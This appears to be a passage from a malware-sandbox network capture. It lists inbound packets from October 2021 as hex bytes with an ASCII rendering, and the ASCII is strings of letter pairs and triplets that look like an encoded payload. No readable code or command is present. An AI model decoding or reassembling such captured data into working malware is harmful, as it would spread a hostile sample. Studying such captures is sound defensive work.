2021-10-27 01:03:08 UTC	226	IN	Data Raw: 71 20 49 70 20 70 77 20 63 78 20 65 71 20 71 20 49 20 70 20 65 4f 20 70 68 20 4f 65 20 77 63 20 71 71 78 20 78 4f 20 71 20 65 65 20 6a 71 20 65 63 20 49 49 20 49 70 20 4f 71 20 70 4f 20 63 70 20 63 71 20 71 20 65 63 20 65 20 4f 71 20 70 65 20 77 71 20 49 49 20 78 4f 20 71 71 78 20 63 65 20 6a 68 20 6a 20 70 77 20 4f 6a 20 70 68 20 4f 68 20 78 63 20 63 65 20 65 70 20 71 20 65 71 20 71 68 68 20 70 63 20 49 78 20 49 4f 20 49 71 20 65 4f 20 65 77 20 78 78 20 78 20 77 68 20 49 49 20 4f 71 20 70 78 20 6a 6a 20 49 20 71 49 20 71 68 4f 20 78 4f 20 49 63 20 49 77 20 70 77 20 4f 71 20 63 78 20 6a 68 20 71 65 20 6a 63 20 71 77 20 4f 63 20 70 63 20 63 68 20 71 71 4f 20 6a 4f 20 71 20 71 49 20 68 20 71 70 20 4f 78 20 77 6a 20 4f 70 20 49 70 20 63 4f 20 65 65 20 68 20 Data Ascii: q Ip pw cx eq q I p eO ph Oe wc qqx xO q ee jq ec II Ip Oq pO cp cq q ec e Oq pe wq II xO qqx ce jh j pw Oj ph Oh xc ce ep q eq qhh pc Ix IO Iq eO ew xx x wh II Oq px jj I qI qhO xO Ic Iw pw Oq cx jh qe jc qw Oc pc ch qqO jO q qI h qp Ox wj Op Ip cO ee h
2021-10-27 01:03:08 UTC	242	IN	Data Raw: 4f 20 63 65 20 49 71 20 78 78 20 49 49 20 70 71 20 70 65 20 49 4f 20 77 49 20 63 49 20 65 71 20 49 77 20 63 65 20 63 65 20 71 68 77 20 70 70 20 49 4f 20 71 65 65 20 49 6a 20 78 65 20 63 78 20 6a 4f 20 63 63 20 70 63 20 71 65 71 20 4f 68 20 4f 68 20 63 49 20 78 68 20 63 78 20 78 65 20 65 4f 20 70 71 20 78 20 49 49 20 71 68 68 20 65 6a 20 77 78 20 77 20 6a 49 20 77 77 20 63 68 20 71 4f 20 71 63 20 77 71 20 78 4f 20 65 49 20 78 70 20 65 4f 20 63 71 20 77 71 20 4f 49 20 71 65 6a 20 77 70 20 71 78 20 6a 65 20 65 6a 20 6a 77 20 71 4f 20 77 65 20 4f 65 20 77 68 20 71 70 20 78 70 20 63 71 20 6a 78 20 78 20 49 70 20 77 63 20 71 68 6a 20 4f 71 20 71 63 20 63 4f 20 49 77 20 78 65 20 6a 20 6a 71 20 4f 77 20 77 68 20 77 71 20 70 4f 20 71 71 65 20 6a 77 20 71 63 20 65 Data Ascii: O ce Iq xx II pq pe IO wI cI eq Iw ce ce qhw pp IO qee Ij xe cx jO cc pc qeq Oh Oh cI xh cx xe eO pq x II qhh ej wx w jI ww ch qO qc wq xO eI xp eO cq wq OI qej wp qx je ej jw qO we Oe wh qp xp cq jx x Ip wc qhj Oq qc cO Iw xe j jq Ow wh wq pO qqe jw qc e
2021-10-27 01:03:08 UTC	258	IN	Data Raw: 20 63 63 20 78 63 20 6a 68 20 4f 68 20 65 63 20 77 65 20 4f 70 20 65 65 20 71 68 70 20 65 49 20 78 20 78 4f 20 65 68 20 63 71 20 71 65 68 20 71 68 63 20 77 20 70 77 20 63 4f 20 78 68 20 49 4f 20 65 68 20 49 6a 20 70 77 20 70 20 71 63 20 63 78 20 71 71 4f 20 77 4f 20 78 20 77 20 6a 70 20 71 65 49 20 4f 65 20 4f 4f 20 49 49 20 49 20 63 71 20 71 63 20 6a 70 20 6a 70 20 71 65 63 20 49 70 20 77 63 20 71 65 65 20 6a 70 20 63 20 49 78 20 49 71 20 65 78 20 4f 71 20 71 71 4f 20 71 68 68 20 4f 49 20 63 77 20 78 65 20 78 20 6a 65 20 63 70 20 71 65 68 20 71 65 77 20 49 63 20 4f 70 20 68 20 77 71 20 78 4f 20 65 71 20 71 77 20 70 77 20 4f 78 20 71 68 71 20 71 71 77 20 71 6a 20 77 4f 20 71 71 77 20 77 70 20 77 77 20 49 77 20 71 71 63 20 4f 68 20 71 71 68 20 78 49 20 65 Data Ascii: cc xc jh Oh ec we Op ee qhp eI x xO eh cq qeh qhc w pw cO xh IO eh Ij pw p qc cx qqO wO x w jp qeI Oe OO II I cq qc jp jp qec Ip wc qee jp c Ix Iq ex Oq qqO qhh OI cw xe x je cp qeh qew Ic Op h wq xO eq qw pw Ox qhq qqw qj wO qqw wp ww Iw qqc Oh qqh xI e
2021-10-27 01:03:08 UTC	274	IN	Data Raw: 20 71 71 77 20 77 70 20 77 77 20 49 77 20 71 71 70 20 70 6a 20 77 70 20 49 68 20 6a 63 20 63 49 20 71 63 20 63 20 71 71 4f 20 77 6a 20 4f 70 20 70 6a 20 65 77 20 71 4f 20 71 77 20 63 77 20 65 65 20 71 65 71 20 71 65 71 20 77 65 20 71 71 68 20 4f 4f 20 77 20 65 63 20 65 49 20 63 4f 20 70 78 20 4f 4f 20 77 71 20 4f 68 20 63 70 20 49 20 71 49 20 63 4f 20 49 20 71 65 65 20 71 68 71 20 65 65 20 71 68 6a 20 71 49 20 6a 68 20 65 65 20 6a 68 20 77 77 20 63 68 20 71 4f 20 71 63 20 77 71 20 6a 65 20 49 65 20 49 20 71 71 20 71 20 4f 70 20 71 68 65 20 4f 4f 20 65 20 4f 4f 20 63 78 20 77 68 20 71 78 20 65 68 20 77 78 20 4f 6a 20 4f 71 20 49 63 20 65 71 20 63 49 20 63 65 20 49 68 20 77 77 20 71 63 20 78 70 20 71 77 20 71 71 20 6a 77 20 49 71 20 49 63 20 63 20 49 20 70 Data Ascii: qqw wp ww Iw qqp pj wp Ih jc cI qc c qqO wj Op pj ew qO qw cw ee qeq qeq we qqh OO w ec eI cO px OO wq Oh cp I qI cO I qee qhq ee qhj qI jh ee jh ww ch qO qc wq je Ie I qq q Op qhe OO e OO cx wh qx eh wx Oj Oq Ic eq cI ce Ih ww qc xp qw qq jw Iq Ic c I p
2021-10-27 01:03:08 UTC	290	IN	Data Raw: 4f 65 20 4f 65 20 63 4f 20 65 20 6a 4f 20 6a 71 20 6a 65 20 70 68 20 4f 65 20 49 77 20 70 6a 20 71 71 65 20 71 71 20 77 20 6a 68 20 70 78 20 49 78 20 49 77 20 77 71 20 6a 20 63 20 77 4f 20 77 65 20 71 68 4f 20 70 6a 20 71 63 20 49 63 20 77 65 20 70 77 20 4f 4f 20 49 71 20 49 70 20 78 78 20 63 49 20 49 78 20 49 49 20 4f 6a 20 71 65 78 20 65 6a 20 49 4f 20 71 65 20 49 6a 20 63 77 20 71 65 68 20 77 78 20 49 20 49 63 20 65 4f 20 49 68 20 6a 4f 20 63 68 20 6a 63 20 70 63 20 4f 63 20 49 20 4f 78 20 71 49 20 65 20 6a 49 20 6a 71 20 65 49 20 71 68 4f 20 71 65 77 20 71 68 77 20 70 68 20 65 4f 20 68 20 65 63 20 6a 4f 20 63 6a 20 71 63 20 78 70 20 71 77 20 71 71 20 6a 77 20 49 77 20 71 20 4f 63 20 6a 63 20 65 65 20 70 4f 20 70 68 20 68 20 6a 49 20 6a 63 20 63 71 20 Data Ascii: Oe Oe cO e jO jq je ph Oe Iw pj qqe qq w jh px Ix Iw wq j c wO we qhO pj qc Ic we pw OO Iq Ip xx cI Ix II Oj qex ej IO qe Ij cw qeh wx I Ic eO Ih jO ch jc pc Oc I Ox qI e jI jq eI qhO qew qhw ph eO h ec jO cj qc xp qw qq jw Iw q Oc jc ee pO ph h jI jc cq
2021-10-27 01:03:08 UTC	306	IN	Data Raw: 68 20 63 65 20 78 68 20 71 68 6a 20 4f 77 20 71 63 20 71 71 20 70 78 20 70 71 20 77 65 20 65 70 20 77 68 20 71 71 63 20 4f 70 20 71 68 49 20 71 68 68 20 77 20 65 6a 20 77 71 20 49 71 20 71 70 20 4f 77 20 49 78 20 49 77 20 6a 20 6a 6a 20 77 68 20 78 65 20 71 78 20 49 63 20 4f 49 20 49 77 20 49 4f 20 71 71 20 71 68 63 20 71 71 78 20 70 49 20 70 68 20 71 20 65 65 20 4f 6a 20 49 77 20 71 71 6a 20 49 20 71 49 20 49 6a 20 4f 63 20 63 70 20 68 20 71 68 68 20 71 65 78 20 70 71 20 63 6a 20 65 65 20 65 49 20 6a 6a 20 63 49 20 71 68 77 20 4f 78 20 71 65 6a 20 71 68 6a 20 71 68 63 20 77 4f 20 71 71 77 20 77 70 20 77 77 20 49 77 20 71 20 71 68 78 20 70 63 20 71 20 71 49 20 6a 68 20 63 4f 20 63 4f 20 49 70 20 77 20 49 4f 20 70 77 20 49 68 20 71 49 20 6a 68 20 63 68 20 Data Ascii: h ce xh qhj Ow qc qq px pq we ep wh qqc Op qhI qhh w ej wq Iq qp Ow Ix Iw j jj wh xe qx Ic OI Iw IO qq qhc qqx pI ph q ee Oj Iw qqj I qI Ij Oc cp h qhh qex pq cj ee eI jj cI qhw Ox qej qhj qhc wO qqw wp ww Iw q qhx pc q qI jh cO cO Ip w IO pw Ih qI jh ch
2021-10-27 01:03:08 UTC	322	IN	Data Raw: 71 20 70 77 20 70 6a 20 71 71 6a 20 71 20 77 4f 20 71 71 77 20 77 70 20 77 77 20 49 77 20 6a 20 70 49 20 71 63 20 65 6a 20 6a 20 63 71 20 49 71 20 68 20 4f 70 20 77 6a 20 65 65 20 49 70 20 65 65 20 65 49 20 78 77 20 65 77 20 4f 20 71 71 49 20 71 65 71 20 4f 49 20 49 4f 20 71 71 20 63 63 20 65 63 20 78 78 20 63 78 20 71 65 77 20 71 65 68 20 71 68 65 20 70 4f 20 4f 49 20 78 68 20 78 77 20 65 78 20 63 6a 20 71 68 4f 20 70 77 20 65 65 20 71 65 68 20 63 68 20 68 20 65 77 20 49 20 77 77 20 63 68 20 71 4f 20 71 63 20 77 71 20 78 4f 20 77 63 20 63 20 63 68 20 6a 65 20 70 63 20 71 65 77 20 71 71 6a 20 4f 63 20 63 4f 20 77 20 78 78 20 63 70 20 71 77 20 4f 68 20 71 65 77 20 4f 77 20 71 71 78 20 6a 71 20 49 20 65 4f 20 4f 6a 20 49 78 20 70 49 20 49 49 20 71 71 20 71 Data Ascii: q pw pj qqj q wO qqw wp ww Iw j pI qc ej j cq Iq h Op wj ee Ip ee eI xw ew O qqI qeq OI IO qq cc ec xx cx qew qeh qhe pO OI xh xw ex cj qhO pw ee qeh ch h ew I ww ch qO qc wq xO wc c ch je pc qew qqj Oc cO w xx cp qw Oh qew Ow qqx jq I eO Oj Ix pI II qq q
2021-10-27 01:03:08 UTC	338	IN	Data Raw: 6a 20 77 63 20 71 71 78 20 71 71 4f 20 49 78 20 63 71 20 6a 68 20 49 68 20 49 6a 20 77 6a 20 49 20 71 71 70 20 71 71 49 20 71 65 6a 20 71 68 4f 20 49 71 20 63 63 20 6a 68 20 71 68 20 71 65 71 20 78 20 70 6a 20 4f 63 20 63 6a 20 70 20 77 20 68 20 63 70 20 49 78 20 4f 77 20 49 63 20 4f 78 20 63 78 20 71 4f 20 77 71 20 49 20 68 20 71 71 70 20 71 68 63 20 71 63 20 63 78 20 71 71 4f 20 77 4f 20 78 20 63 20 63 20 70 78 20 71 65 78 20 70 70 20 49 4f 20 6a 4f 20 6a 4f 20 65 78 20 49 20 49 65 20 71 68 4f 20 4f 6a 20 71 68 49 20 71 65 49 20 6a 6a 20 6a 77 20 63 70 20 63 6a 20 65 70 20 71 68 20 70 77 20 71 68 6a 20 71 71 78 20 78 78 20 65 77 20 71 77 20 6a 20 6a 70 20 70 49 20 71 68 6a 20 71 68 77 20 71 70 20 6a 65 20 63 70 20 65 4f 20 65 4f 20 49 49 20 71 65 65 20 Data Ascii: j wc qqx qqO Ix cq jh Ih Ij wj I qqp qqI qej qhO Iq cc jh qh qeq x pj Oc cj p w h cp Ix Ow Ic Ox cx qO wq I h qqp qhc qc cx qqO wO x c c px qex pp IO jO jO ex I Ie qhO Oj qhI qeI jj jw cp cj ep qh pw qhj qqx xx ew qw j jp pI qhj qhw qp je cp eO eO II qee
2021-10-27 01:03:08 UTC	354	IN	Data Raw: 70 77 20 49 70 20 63 49 20 71 71 20 65 70 20 6a 20 65 6a 20 71 68 65 20 77 6a 20 49 49 20 70 6a 20 70 78 20 65 71 20 71 49 20 65 63 20 78 77 20 71 68 71 20 70 4f 20 70 49 20 49 49 20 49 68 20 71 71 78 20 71 70 20 70 20 78 20 71 68 4f 20 71 65 68 20 70 77 20 4f 63 20 63 71 20 65 49 20 71 20 71 68 4f 20 65 6a 20 70 77 20 49 70 20 71 68 4f 20 71 71 68 20 70 78 20 65 71 20 71 49 20 65 63 20 78 77 20 71 68 77 20 78 70 20 4f 77 20 70 6a 20 6a 65 20 49 65 20 71 49 20 6a 20 65 6a 20 77 68 20 70 70 20 63 68 20 71 68 68 20 78 4f 20 71 4f 20 71 77 20 78 77 20 6a 71 20 4f 6a 20 4f 65 20 70 77 20 70 77 20 63 70 20 71 71 78 20 6a 4f 20 70 20 71 77 20 70 49 20 71 71 63 20 4f 68 20 70 77 20 6a 70 20 71 71 78 20 6a 4f 20 70 20 71 77 20 70 49 20 4f 4f 20 77 68 20 49 70 20 Data Ascii: pw Ip cI qq ep j ej qhe wj II pj px eq qI ec xw qhq pO pI II Ih qqx qp p x qhO qeh pw Oc cq eI q qhO ej pw Ip qhO qqh px eq qI ec xw qhw xp Ow pj je Ie qI j ej wh pp ch qhh xO qO qw xw jq Oj Oe pw pw cp qqx jO p qw pI qqc Oh pw jp qqx jO p qw pI OO wh Ip
2021-10-27 01:03:08 UTC	370	IN	Data Raw: 6a 4f 20 63 63 20 63 6a 20 6a 49 20 71 68 68 20 4f 49 20 65 78 78 20 71 71 49 20 71 65 49 20 6a 65 20 71 77 77 20 78 6a 20 6a 63 20 49 4f 20 65 78 65 20 65 71 49 20 71 68 70 20 4f 70 20 65 20 63 49 20 78 77 20 63 49 20 4f 6a 20 71 71 78 20 71 71 70 20 71 71 65 20 71 65 49 20 49 68 20 49 65 20 6a 63 20 71 70 6a 20 78 63 20 71 71 4f 20 71 71 77 20 71 71 71 20 71 71 6a 20 49 68 20 63 68 20 78 63 20 78 4f 20 4f 65 20 71 71 71 20 71 71 65 20 71 65 68 20 4f 70 20 71 77 70 20 71 63 6a 20 63 71 20 78 65 20 4f 68 20 71 65 78 20 4f 49 20 71 65 78 20 65 78 68 20 71 63 71 20 63 68 20 49 68 20 78 65 20 77 68 20 65 78 6a 20 71 68 70 20 71 68 71 20 71 68 4f 20 6a 4f 20 6a 6a 20 71 77 70 20 71 78 77 20 70 49 20 71 65 78 20 71 68 63 20 4f 49 20 71 71 4f 20 63 6a 20 78 63 Data Ascii: jO cc cj jI qhh OI exx qqI qeI je qww xj jc IO exe eqI qhp Op e cI xw cI Oj qqx qqp qqe qeI Ih Ie jc qpj xc qqO qqw qqq qqj Ih ch xc xO Oe qqq qqe qeh Op qwp qcj cq xe Oh qex OI qex exh qcq ch Ih xe wh exj qhp qhq qhO jO jj qwp qxw pI qex qhc OI qqO cj xc
2021-10-27 01:03:08 UTC	386	IN	Data Raw: 65 20 71 77 71 20 71 49 6a 20 71 4f 68 20 71 49 71 20 71 63 65 20 71 63 63 20 71 71 49 20 65 71 4f 20 71 4f 78 20 71 63 6a 20 71 6a 71 20 4f 49 20 71 70 70 20 65 68 49 20 71 70 70 20 71 71 65 20 65 77 20 71 71 65 20 70 6a 20 65 6a 4f 20 49 77 20 49 20 71 63 78 20 63 71 20 71 63 49 20 65 78 6a 20 65 68 49 20 65 65 63 20 6a 71 20 71 63 77 20 71 65 77 20 77 70 20 71 68 4f 20 71 65 4f 20 71 70 71 20 71 78 63 20 4f 6a 20 71 4f 49 20 71 78 71 20 71 70 6a 20 65 78 49 20 65 68 65 20 70 49 20 78 6a 20 65 6a 65 20 71 65 78 20 71 65 68 20 71 71 68 20 71 70 20 71 68 68 20 71 6a 49 20 71 65 4f 20 77 20 65 78 68 20 65 78 78 20 65 6a 6a 20 4f 4f 20 71 78 65 20 65 68 63 20 4f 20 71 68 49 20 63 68 20 6a 71 20 71 49 70 20 49 4f 20 65 6a 6a 20 6a 20 65 68 77 20 71 4f 71 20 Data Ascii: e qwq qIj qOh qIq qce qcc qqI eqO qOx qcj qjq OI qpp ehI qpp qqe ew qqe pj ejO Iw I qcx cq qcI exj ehI eec jq qcw qew wp qhO qeO qpq qxc Oj qOI qxq qpj exI ehe pI xj eje qex qeh qqh qp qhh qjI qeO w exh exx ejj OO qxe ehc O qhI ch jq qIp IO ejj j ehw qOq
2021-10-27 01:03:08 UTC	402	IN	Data Raw: 71 6a 65 20 71 77 49 20 71 6a 4f 20 71 49 49 20 71 65 6a 20 77 71 20 4f 70 20 65 71 68 20 71 4f 70 20 65 78 70 20 71 71 70 20 4f 78 20 71 77 20 77 70 20 65 65 49 20 71 4f 70 20 71 49 6a 20 71 70 78 20 71 49 49 20 65 78 4f 20 71 77 77 20 71 70 65 20 78 70 20 6a 77 20 6a 71 20 65 6a 63 20 63 71 20 4f 71 20 65 65 78 20 71 68 71 20 6a 65 20 78 71 20 71 68 70 20 78 4f 20 6a 77 20 71 63 68 20 65 63 68 20 71 70 63 20 65 65 68 20 71 71 77 20 71 70 71 20 65 6a 6a 20 78 65 20 49 6a 20 71 63 63 20 71 49 4f 20 70 49 20 71 65 70 20 63 49 20 4f 78 20 71 6a 6a 20 71 68 63 20 71 6a 6a 20 78 68 20 77 49 20 71 68 4f 20 6a 71 20 6a 63 20 71 68 78 20 65 68 6a 20 77 65 20 63 70 20 71 70 6a 20 71 71 65 20 78 68 20 71 78 6a 20 71 49 70 20 71 68 63 20 65 68 70 20 49 68 20 65 68 Data Ascii: qje qwI qjO qII qej wq Op eqh qOp exp qqp Ox qw wp eeI qOp qIj qpx qII exO qww qpe xp jw jq ejc cq Oq eex qhq je xq qhp xO jw qch ech qpc eeh qqw qpq ejj xe Ij qcc qIO pI qep cI Ox qjj qhc qjj xh wI qhO jq jc qhx ehj we cp qpj qqe xh qxj qIp qhc ehp Ih eh
2021-10-27 01:03:08 UTC	418	IN	Data Raw: 71 77 49 20 71 70 78 20 63 78 20 71 63 65 20 65 78 63 20 71 63 6a 20 65 65 49 20 77 65 20 71 6a 70 20 65 71 71 20 71 6a 63 20 71 49 65 20 65 71 6a 20 49 78 20 65 78 63 20 71 49 71 20 71 78 65 20 65 78 20 71 4f 20 65 78 6a 20 65 68 78 20 71 65 78 20 71 70 68 20 49 20 71 70 70 20 6a 70 20 6a 77 20 71 4f 63 20 77 78 20 65 65 20 78 68 20 71 68 63 20 78 78 20 65 78 4f 20 49 4f 20 71 71 70 20 49 20 63 6a 20 65 68 49 20 71 49 77 20 77 71 20 71 65 77 20 65 78 70 20 71 77 68 20 71 6a 63 20 65 71 20 63 20 63 71 20 71 49 65 20 71 71 78 20 49 68 20 63 78 20 65 78 71 20 71 70 71 20 4f 68 20 71 77 77 20 63 6a 20 71 70 4f 20 65 71 6a 20 65 68 65 20 65 71 20 71 49 4f 20 49 77 20 71 71 68 20 65 65 78 20 65 78 77 20 71 77 71 20 71 68 77 20 65 65 65 20 77 68 20 65 65 63 20 Data Ascii: qwI qpx cx qce exc qcj eeI we qjp eqq qjc qIe eqj Ix exc qIq qxe ex qO exj ehx qex qph I qpp jp jw qOc wx ee xh qhc xx exO IO qqp I cj ehI qIw wq qew exp qwh qjc eq c cq qIe qqx Ih cx exq qpq Oh qww cj qpO eqj ehe eq qIO Iw qqh eex exw qwq qhw eee wh eec
2021-10-27 01:03:08 UTC	434	IN	Data Raw: 20 71 77 20 65 6a 6a 20 71 4f 6a 20 65 78 6a 20 63 63 20 65 78 49 20 65 63 63 20 78 49 20 78 65 20 71 71 68 20 65 78 63 20 68 20 71 70 68 20 71 78 78 20 71 63 4f 20 6a 49 20 65 65 63 20 71 6a 77 20 65 6a 77 20 4f 6a 20 71 6a 6a 20 71 70 6a 20 71 63 78 20 71 63 71 20 71 71 77 20 71 71 4f 20 71 49 20 71 6a 78 20 77 71 20 65 6a 4f 20 71 49 65 20 71 77 77 20 49 71 20 71 77 49 20 65 6a 68 20 6a 71 20 71 63 20 71 77 6a 20 71 6a 4f 20 71 68 70 20 63 63 20 65 49 20 77 49 20 71 77 4f 20 71 63 63 20 71 49 68 20 4f 6a 20 65 65 6a 20 71 49 71 20 65 65 49 20 71 77 6a 20 71 6a 68 20 65 71 70 20 65 65 70 20 71 70 6a 20 71 4f 77 20 71 65 49 20 65 65 20 63 6a 20 65 68 4f 20 63 49 20 65 78 49 20 71 65 70 20 71 63 77 20 71 78 4f 20 65 68 70 20 71 65 20 77 68 20 71 63 70 20 Data Ascii: qw ejj qOj exj cc exI ecc xI xe qqh exc h qph qxx qcO jI eec qjw ejw Oj qjj qpj qcx qcq qqw qqO qI qjx wq ejO qIe qww Iq qwI ejh jq qc qwj qjO qhp cc eI wI qwO qcc qIh Oj eej qIq eeI qwj qjh eqp eep qpj qOw qeI ee cj ehO cI exI qep qcw qxO ehp qe wh qcp
2021-10-27 01:03:08 UTC	450	IN	Data Raw: 71 71 78 20 65 78 49 20 6a 70 20 71 68 20 71 77 49 20 65 78 4f 20 49 77 20 71 78 78 20 70 63 20 71 68 49 20 4f 68 20 71 71 77 20 71 78 78 20 71 4f 4f 20 4f 68 20 71 78 70 20 49 49 20 65 6a 65 20 71 65 49 20 71 63 20 71 63 68 20 78 68 20 71 71 49 20 49 77 20 65 6a 68 20 71 68 71 20 71 71 70 20 49 20 71 63 6a 20 65 65 49 20 4f 68 20 4f 65 20 65 63 71 20 71 4f 20 71 6a 71 20 71 70 68 20 70 4f 20 77 20 70 6a 20 71 63 4f 20 71 4f 4f 20 6a 6a 20 65 78 70 20 49 20 70 49 20 65 77 20 65 78 6a 20 71 78 63 20 65 78 4f 20 4f 71 20 63 20 71 6a 6a 20 4f 77 20 71 6a 49 20 71 77 6a 20 65 77 20 78 63 20 65 6a 65 20 71 70 77 20 65 6a 71 20 65 68 71 20 65 78 6a 20 65 65 6a 20 71 68 78 20 71 71 65 20 65 6a 71 20 78 63 20 71 71 78 20 4f 68 20 65 68 70 20 65 6a 71 20 4f 77 20 Data Ascii: qqx exI jp qh qwI exO Iw qxx pc qhI Oh qqw qxx qOO Oh qxp II eje qeI qc qch xh qqI Iw ejh qhq qqp I qcj eeI Oh Oe ecq qO qjq qph pO w pj qcO qOO jj exp I pI ew exj qxc exO Oq c qjj Ow qjI qwj ew xc eje qpw ejq ehq exj eej qhx qqe ejq xc qqx Oh ehp ejq Ow
2021-10-27 01:03:08 UTC	466	IN	Data Raw: 71 6a 77 20 65 71 78 20 71 63 4f 20 71 77 68 20 71 65 63 20 71 6a 63 20 71 77 4f 20 65 78 78 20 77 78 20 65 78 70 20 71 68 65 20 65 68 68 20 6a 68 20 71 65 70 20 71 49 70 20 65 77 20 65 71 71 20 71 6a 68 20 71 4f 49 20 71 68 78 20 65 78 68 20 65 71 20 71 70 70 20 65 6a 70 20 65 78 4f 20 65 71 78 20 70 71 20 65 68 20 71 65 65 20 65 78 20 71 65 6a 20 49 78 20 71 70 68 20 78 20 71 71 4f 20 71 65 49 20 65 65 20 71 49 49 20 49 20 65 65 49 20 71 6a 71 20 71 6a 77 20 65 68 65 20 4f 70 20 71 77 78 20 70 70 20 71 6a 71 20 65 68 49 20 77 77 20 65 63 71 20 6a 68 20 65 63 78 20 71 4f 4f 20 71 63 63 20 71 65 6a 20 65 78 78 20 65 68 20 71 65 71 20 77 65 20 65 63 68 20 71 71 20 71 4f 20 71 71 78 20 65 6a 70 20 71 70 20 77 4f 20 71 77 63 20 71 68 70 20 71 49 77 20 71 70 Data Ascii: qjw eqx qcO qwh qec qjc qwO exx wx exp qhe ehh jh qep qIp ew eqq qjh qOI qhx exh eq qpp ejp exO eqx pq eh qee ex qej Ix qph x qqO qeI ee qII I eeI qjq qjw ehe Op qwx pp qjq ehI ww ecq jh ecx qOO qcc qej exx eh qeq we ech qq qO qqx ejp qp wO qwc qhp qIw qp
2021-10-27 01:03:08 UTC	482	IN	Data Raw: 65 65 68 20 65 68 20 71 68 68 20 71 4f 71 20 71 71 49 20 63 78 20 71 4f 49 20 71 49 77 20 71 71 71 20 65 63 20 71 68 65 20 71 78 6a 20 78 65 20 71 6a 78 20 65 68 6a 20 71 4f 63 20 71 4f 70 20 65 65 20 65 68 70 20 71 71 65 20 71 70 77 20 71 78 77 20 65 63 78 20 4f 65 20 65 78 70 20 63 49 20 71 68 70 20 78 77 20 71 77 78 20 71 6a 70 20 78 77 20 71 78 49 20 71 70 4f 20 71 71 68 20 65 65 70 20 65 65 70 20 65 63 65 20 65 71 65 20 63 77 20 71 70 20 65 63 68 20 65 71 63 20 71 63 77 20 71 78 71 20 65 77 20 65 65 6a 20 65 78 4f 20 65 63 63 20 65 71 70 20 71 4f 78 20 63 71 20 71 65 77 20 71 65 68 20 71 49 68 20 71 49 6a 20 65 71 68 20 65 63 65 20 49 77 20 71 65 63 20 6a 20 71 71 68 20 71 70 71 20 71 71 49 20 71 77 20 70 71 20 77 20 71 4f 71 20 49 71 20 65 68 77 20 Data Ascii: eeh eh qhh qOq qqI cx qOI qIw qqq ec qhe qxj xe qjx ehj qOc qOp ee ehp qqe qpw qxw ecx Oe exp cI qhp xw qwx qjp xw qxI qpO qqh eep eep ece eqe cw qp ech eqc qcw qxq ew eej exO ecc eqp qOx cq qew qeh qIh qIj eqh ece Iw qec j qqh qpq qqI qw pq w qOq Iq ehw
2021-10-27 01:03:08 UTC	498	IN	Data Raw: 71 20 71 78 20 71 6a 49 20 65 65 49 20 71 6a 63 20 65 71 78 20 49 68 20 49 77 20 65 71 68 20 71 65 70 20 71 70 77 20 71 65 70 20 77 63 20 65 65 49 20 71 71 77 20 4f 65 20 65 6a 78 20 71 4f 65 20 71 68 68 20 63 65 20 49 6a 20 65 6a 78 20 71 4f 68 20 65 71 4f 20 49 70 20 6a 71 20 65 78 68 20 71 63 71 20 49 70 20 71 71 20 71 63 78 20 49 78 20 65 78 70 20 71 70 77 20 71 6a 63 20 65 49 20 71 77 68 20 71 68 4f 20 77 68 20 71 63 71 20 6a 65 20 65 78 65 20 65 78 20 71 6a 6a 20 70 63 20 78 49 20 71 63 78 20 6a 71 20 70 4f 20 77 65 20 63 63 20 65 68 77 20 65 20 65 6a 77 20 65 4f 20 71 65 20 71 6a 63 20 71 71 70 20 77 49 20 71 6a 68 20 49 63 20 71 71 20 71 65 49 20 78 71 20 70 68 20 71 4f 70 20 70 71 20 65 70 20 71 49 65 20 71 65 49 20 65 71 78 20 65 71 77 20 71 78 Data Ascii: q qx qjI eeI qjc eqx Ih Iw eqh qep qpw qep wc eeI qqw Oe ejx qOe qhh ce Ij ejx qOh eqO Ip jq exh qcq Ip qq qcx Ix exp qpw qjc eI qwh qhO wh qcq je exe ex qjj pc xI qcx jq pO we cc ehw e ejw eO qe qjc qqp wI qjh Ic qq qeI xq ph qOp pq ep qIe qeI eqx eqw qx
2021-10-27 01:03:08 UTC	514	IN	Data Raw: 78 63 20 78 49 20 65 71 70 20 70 20 65 65 70 20 65 65 70 20 71 71 65 20 71 49 65 20 71 68 6a 20 6a 77 20 63 71 20 63 68 20 77 49 20 63 63 20 71 78 20 65 68 77 20 77 77 20 71 65 78 20 65 78 65 20 63 78 20 71 65 63 20 71 4f 6a 20 65 78 78 20 71 65 20 4f 49 20 70 6a 20 71 78 68 20 63 49 20 71 65 70 20 70 4f 20 78 20 71 77 6a 20 4f 77 20 71 4f 20 65 71 70 20 6a 77 20 65 71 78 20 6a 65 20 71 6a 78 20 71 70 70 20 71 70 71 20 65 63 63 20 70 78 20 71 77 20 65 20 71 49 20 71 65 68 20 71 65 6a 20 71 78 77 20 65 78 70 20 65 78 70 20 71 78 20 71 70 49 20 71 78 77 20 65 6a 49 20 71 77 4f 20 65 68 68 20 71 71 68 20 70 49 20 65 65 77 20 65 78 49 20 71 71 78 20 65 78 78 20 71 65 63 20 4f 20 71 49 4f 20 71 77 65 20 71 6a 77 20 65 6a 77 20 65 20 65 78 63 20 71 49 77 20 71 Data Ascii: xc xI eqp p eep eep qqe qIe qhj jw cq ch wI cc qx ehw ww qex exe cx qec qOj exx qe OI pj qxh cI qep pO x qwj Ow qO eqp jw eqx je qjx qpp qpq ecc px qw e qI qeh qej qxw exp exp qx qpI qxw ejI qwO ehh qqh pI eew exI qqx exx qec O qIO qwe qjw ejw e exc qIw q
2021-10-27 01:03:08 UTC	530	IN	Data Raw: 77 70 20 71 78 77 20 77 6a 20 71 68 4f 20 71 63 49 20 65 63 78 20 71 77 71 20 71 65 6a 20 71 68 77 20 71 78 68 20 65 65 20 71 77 71 20 65 78 70 20 71 4f 77 20 49 63 20 70 78 20 65 78 20 49 68 20 71 49 20 65 6a 70 20 4f 49 20 65 78 20 6a 68 20 4f 71 20 65 78 78 20 65 78 78 20 71 4f 78 20 65 65 20 65 65 63 20 65 78 70 20 4f 49 20 71 65 65 20 78 6a 20 71 68 70 20 68 20 70 4f 20 65 65 71 20 71 77 6a 20 65 71 63 20 78 68 20 71 70 70 20 71 70 6a 20 71 63 65 20 71 6a 68 20 49 78 20 71 4f 71 20 63 77 20 71 49 20 71 6a 70 20 4f 78 20 71 70 77 20 71 71 20 49 63 20 65 77 20 49 68 20 71 63 63 20 65 6a 65 20 78 4f 20 71 63 71 20 71 77 4f 20 63 71 20 65 68 6a 20 71 6a 49 20 71 65 77 20 65 78 71 20 63 63 20 78 63 20 65 6a 77 20 71 4f 49 20 65 49 20 71 78 63 20 4f 49 20 Data Ascii: wp qxw wj qhO qcI ecx qwq qej qhw qxh ee qwq exp qOw Ic px ex Ih qI ejp OI ex jh Oq exx exx qOx ee eec exp OI qee xj qhp h pO eeq qwj eqc xh qpp qpj qce qjh Ix qOq cw qI qjp Ox qpw qq 